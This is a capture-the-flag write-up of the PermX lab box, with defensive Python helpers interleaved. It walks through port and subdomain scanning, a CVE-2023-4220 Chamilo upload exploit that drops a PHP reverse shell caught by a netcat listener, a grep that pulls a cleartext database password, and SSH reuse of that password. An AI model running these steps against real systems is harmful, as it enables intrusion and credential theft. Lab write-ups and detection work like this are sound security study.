Reconnaissance
T1595.002 - Active Scanning: Vulnerability Scanning
Initial Reconnaissance with nmap
- Objective: Discover active services and versions running on the target.
- Purpose: Identifying services and their versions helps find potential vulnerabilities.
- Explanation: The nmap scan targets the host to list open ports and reveal detailed service information.
- Command:

```
nmap -sC -sV -Pn 10.10.11.23
```

- Explanation: The nmap command scans the target's IP for open ports and available services. Its flags:
  - `-sC`: Run the default Nmap scripts, which test for basic vulnerabilities.
  - `-sV`: Identify the version of each detected service.
  - `-Pn`: Skip host discovery and treat the target as online, which bypasses firewall rules that block ping requests.
- Output:

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: eLEARNING
|_http-server-header: Apache/2.4.52 (Ubuntu)
```

- Interpretation:
  - Port 22 is open and running OpenSSH 8.9p1, suggesting potential SSH access.
  - Port 80 is open and hosts an Apache HTTP server whose page title is "eLEARNING", indicating a web-based application on this port. The server banner hints at a specific service that may be exploitable based on known vulnerabilities in Apache or the web application itself.
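The scan output above is the normal nmap text format; turning it into structured records lets a defender keep an inventory of exposed services and diff it between scans. The parser below is an added example (not part of the write-up) and is fed the write-up's own output, re-typed one line per row, as its constructed sample.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the scan output shown in this write-up, one line per row.
NMAP_OUTPUT = """\
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: eLEARNING
|_http-server-header: Apache/2.4.52 (Ubuntu)
"""
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_LINE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")  # e.g. "|_http-title: eLEARNING"

@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str
    scripts: dict = field(default_factory=dict)

def parse_nmap(text):
    """Parse nmap's normal output into Service records. NSE script lines
    ("| name: value") attach to the port they follow; continuation lines
    (the individual host keys here) are appended to that script's value."""
    services, last_key = [], None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            services.append(Service(int(port), proto, state, name, version.strip()))
            last_key = None
        elif services and line.startswith("|"):
            m = SCRIPT_LINE.match(line)
            if m:
                last_key = m.group(1)
                services[-1].scripts[last_key] = m.group(2).strip()
            elif last_key:
                tail = line.lstrip("|_ ").strip()
                services[-1].scripts[last_key] = (services[-1].scripts[last_key] + " " + tail).strip()
    return services

def open_services(services):
    """Inventory lines a defender can store and diff between scans."""
    return [f"{s.port}/{s.proto} {s.name} {s.version}".strip() for s in services if s.state == "open"]
```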
T1596.004 - Search Open Websites/Domains
Subdomain Enumeration with ffuf
- Objective: Enumerate subdomains to identify additional web applications or services.
- Purpose: Discovering subdomains broadens the attack surface by revealing alternative endpoints, which may have weaker security.
- Explanation: ffuf is run with a wordlist to find responsive subdomains by sending requests whose "Host" header is set to each candidate name.
- Command:

```
ffuf -u http://permx.htb -H "Host: FUZZ.permx.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -mc 200
```

- Explanation: ffuf brute-forces subdomains by substituting each wordlist entry for the FUZZ placeholder in the HTTP Host header.
  - `-u http://permx.htb`: Specifies the main domain to fuzz.
  - `-H "Host: FUZZ.permx.htb"`: Sets the Host header so that each request tests a different subdomain (virtual host).
  - `-w`: Specifies the wordlist of subdomain names.
  - `-mc 200`: Only show responses with HTTP status 200 (OK), indicating active subdomains.
- Output:

```
www [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 22ms]
lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 49ms]
```

- Interpretation: The www and lms subdomains were identified as accessible, each returning HTTP status code 200. This suggests two points of interest, www.permx.htb and lms.permx.htb, with lms.permx.htb likely hosting the Chamilo LMS application based on prior observations of the page title.
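Host-header fuzzing of this kind leaves a distinctive trace in the web server's logs: one client address cycling through many different Host values within seconds. The detector below is an added example, not part of the write-up; it assumes an Apache LogFormat that records `%{Host}i` (an assumption) and runs over a constructed log sample.

```python
import re
from collections import defaultdict
from datetime import datetime

# Assumed Apache LogFormat (an assumption, not from the write-up):
#   LogFormat "%h %t \"%{Host}i\" \"%r\" %>s %O" hostlog
LINE = re.compile(r'^(\S+) \[([^\]]+)\] "([^"]*)" "([^"]*)" (\d{3}) (\d+)$')
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one client cycling Host values the way a wordlist-driven
# vhost brute force does, plus an ordinary visitor from another address.
SAMPLE_LOG = """\
10.10.14.5 [06/Nov/2024:10:00:01 +0000] "www.permx.htb" "GET / HTTP/1.1" 200 36182
10.10.14.5 [06/Nov/2024:10:00:01 +0000] "mail.permx.htb" "GET / HTTP/1.1" 302 0
10.10.14.5 [06/Nov/2024:10:00:01 +0000] "ftp.permx.htb" "GET / HTTP/1.1" 302 0
10.10.14.5 [06/Nov/2024:10:00:02 +0000] "lms.permx.htb" "GET / HTTP/1.1" 200 19347
10.10.14.5 [06/Nov/2024:10:00:02 +0000] "dev.permx.htb" "GET / HTTP/1.1" 302 0
10.10.14.5 [06/Nov/2024:10:00:02 +0000] "test.permx.htb" "GET / HTTP/1.1" 302 0
10.10.14.9 [06/Nov/2024:10:00:03 +0000] "www.permx.htb" "GET /index.html HTTP/1.1" 200 36182
"""

def parse_log(text):
    """Yield (client_ip, timestamp, host_header, status) for each well-formed line."""
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            ip, ts, host, _req, status, _size = m.groups()
            yield ip, datetime.strptime(ts, TS_FORMAT), host, int(status)

def vhost_fuzz_sources(text, window_s=60, min_hosts=5):
    """Return {client_ip: sorted Host values} for clients that used at least
    `min_hosts` distinct Host headers within any `window_s`-second span.
    Legitimate clients stick to one or two names; FUZZ.permx.htb-style
    enumeration burns through dozens per second."""
    by_ip = defaultdict(list)
    for ip, when, host, _status in parse_log(text):
        by_ip[ip].append((when, host))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            seen = {h for t, h in events[i:] if (t - start).total_seconds() <= window_s}
            if len(seen) >= min_hosts:
                flagged[ip] = sorted({h for _, h in events})
                break
    return flagged
```

Alerting on the flagged address, or rate-limiting unknown Host values at the reverse proxy, catches the enumeration before a hidden virtual host such as the LMS is found.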
Initial Access
T1190 - Exploit Public-Facing Application
Exploit: CVE-2023-4220
- Objective: Gain a foothold on the target system by exploiting a vulnerability in the Chamilo LMS.
- Purpose: CVE-2023-4220 permits unrestricted file uploads, leading to possible remote code execution (RCE) and server compromise.
- Explanation: Using a publicly available exploit, a PHP reverse shell payload is uploaded to execute commands on the server.
- Steps:
  - Prepare Reverse Shell: A PHP reverse shell script from PentestMonkey is used.
  - Start Listener: Begin listening on port 9001.

```
nc -lvnp 9001
```

  - `nc`: Netcat utility for listening or connecting over TCP/UDP.
  - `-lvnp 9001`: Listen (`l`) verbosely (`v`) on port (`p`) 9001 and skip DNS lookups (`n`).
  - Run Exploit:

```
./CVE-2023-4220.sh -f ./shell.php -h http://lms.permx.htb/ -p 9001
```

  - `-f ./shell.php`: Specifies the shell file to upload.
  - `-h http://lms.permx.htb/`: Specifies the LMS subdomain.
  - `-p 9001`: Port on which the reverse shell connects back.
- Output: The reverse shell connects, providing an interactive shell on the server as the www-data user.
- Interpretation: Successfully exploited the Chamilo LMS application to gain a www-data shell, confirming that the CVE-2023-4220 vulnerability exists and is exploitable on this system.
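The upload bug works because a file containing PHP code lands in a directory the web server will execute from, regardless of the extension it was uploaded with. A content-based sweep of the upload tree is one way to spot such a payload after the fact; the scanner below is an added example (not the write-up's code), its sample tree and file contents are constructed, and the directory names are made up rather than Chamilo's real layout.

```python
import os
import re

# PHP opening tags. "<?xml" is deliberately not matched, and bare "<?" short
# tags are ignored because they would flag every XML file in the tree.
PHP_TAG = re.compile(rb"<\?php\b|<\?=")

# Constructed sample tree (paths and contents are made up, not from the box):
# a benign image, a text note, an XML feed, and a payload hidden behind a GIF
# header and a double extension, the shape an unrestricted upload lets through.
SAMPLE_UPLOADS = {
    "images/photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF",
    "docs/notes.txt": b"just some text",
    "docs/feed.xml": b"<?xml version='1.0'?><rss/>",
    "images/avatar.php.jpg": b"GIF89a<?php echo 'placeholder'; ?>",
}

def contains_php(data):
    """True if the bytes contain a PHP opening tag anywhere."""
    return PHP_TAG.search(data) is not None

def find_php_payloads(files):
    """files: {relative_path: bytes}. Return the sorted paths holding PHP code,
    judged by content rather than by extension or declared MIME type."""
    return sorted(path for path, data in files.items() if contains_php(data))

def scan_upload_dir(root, max_bytes=4 << 20):
    """Read every file under `root` (the first max_bytes of each) and report
    PHP payloads. Point it at the web application's upload directory."""
    found = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    found[os.path.relpath(path, root)] = fh.read(max_bytes)
            except OSError:
                continue
    return find_php_payloads(found)
```

The lasting fix is to disable PHP execution for upload directories in the web server configuration so that even a file that slips past upload validation is served as static content.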
Credential Access
T1552.001 - Credentials in Files
Accessing Configuration Files for Credentials
- Objective: Extract database and system credentials stored in Chamilo configuration files.
- Purpose: Configuration files may contain cleartext credentials that allow further access to databases or remote services.
- Explanation: Chamilo LMS stores its settings, including database credentials, in configuration.php, which the www-data user can read directly.
- Command:

```
grep -E '^[^/]*\$_configuration\[' /var/www/chamilo/app/config/configuration.php
```

  - `grep -E '^[^/]*\$_configuration\['`: Extended regular expression search of configuration.php for lines containing `$_configuration[` with no `/` before it, so commented-out (`//`) lines are skipped.
  - This command lists the variables that hold sensitive data such as usernames and passwords.
- Output:

```
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
```

- Interpretation: The database username and password were retrieved. If the same credentials are reused for SSH or other services, they enable further access. Here, the recovered password is confirmed as valid for SSH login as the mtz user.
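The same parsing the grep command does by hand can be automated to audit configuration files for stored secrets and report them with values masked. The script below is an added example, not the write-up's code; its sample configuration is constructed in the shape of Chamilo's configuration.php, with made-up values rather than the credentials shown above.

```python
import re

# Matches Chamilo-style PHP assignments: $_configuration['db_password'] = '...';
ASSIGN = re.compile(r"""\$_configuration\[\s*['"]([^'"]+)['"]\s*\]\s*=\s*['"]([^'"]*)['"]\s*;""")
SECRET_KEYS = re.compile(r"pass|secret|key|token|salt", re.IGNORECASE)

# Constructed sample in the shape of Chamilo's configuration.php
# (values are made up; they are not the write-up's credentials).
SAMPLE_CONFIG = """\
<?php
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_user'] = 'chamilo';
//$_configuration['db_password'] = 'old-commented-out';
$_configuration['db_password'] = 'CONSTRUCTED-PASSWORD';
$_configuration['security_key'] = 'CONSTRUCTED-KEY';
"""

def parse_configuration(text):
    """Return {key: value} for uncommented $_configuration assignments.
    Mirrors the write-up's grep: a line is skipped when a '/' (a // comment
    marker) appears before the assignment."""
    found = {}
    for line in text.splitlines():
        m = ASSIGN.search(line)
        if m and "/" not in line[:m.start()]:
            found[m.group(1)] = m.group(2)
    return found

def mask(value):
    """Keep the first two characters so a reviewer can recognise a value
    without the report itself becoming a credential leak."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "**"

def secret_report(config):
    """Keys whose names suggest a secret, with masked values, for an audit log."""
    return {k: mask(v) for k, v in config.items() if SECRET_KEYS.search(k)}
```

Run periodically against application config files, the report shows which secrets live in cleartext on disk; those are the values that must be unique per service, since reuse is exactly what turned a database password into an SSH login here.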
Lateral Movement
T1021.001 - Remote Services: SSH
SSH Access with Recovered Credentials
- Objective: Use the recovered credentials to log in via SSH and access files on the system as mtz.
- Purpose: SSH provides a stable and secure connection, allowing for further reconnaissance and data extraction.
- Explanation: Using the Chamilo database password, we attempt an SSH login as mtz.
- Command:

```
ssh mtz@10.10.11.23
```

  - Initiates an SSH login as the mtz user, supplying the recovered password when prompted.
- Output:

```
mtz@permx:~$ ls
user.txt
```

- Interpretation: The successful login confirms that mtz's SSH password was reused in Chamilo LMS, granting access to user.txt and verifying control over the mtz account on the system.
Conclusion
In this exercise, we exploited the PermX machine by leveraging service enumeration, a known vulnerability, and insecure credential storage. The step-by-step methodology emphasized:
- Service and Subdomain Discovery: Uncovering exposed services, including an LMS vulnerable to RCE.
- Exploitation of Public Vulnerabilities: Using CVE-2023-4220 to gain initial access.
- Credential Harvesting and Reuse: Extracting database credentials from configuration files, then reusing them for SSH access.
Key mitigations include restricting public access to sensitive applications, updating software to patch known vulnerabilities, and enforcing unique passwords across different services.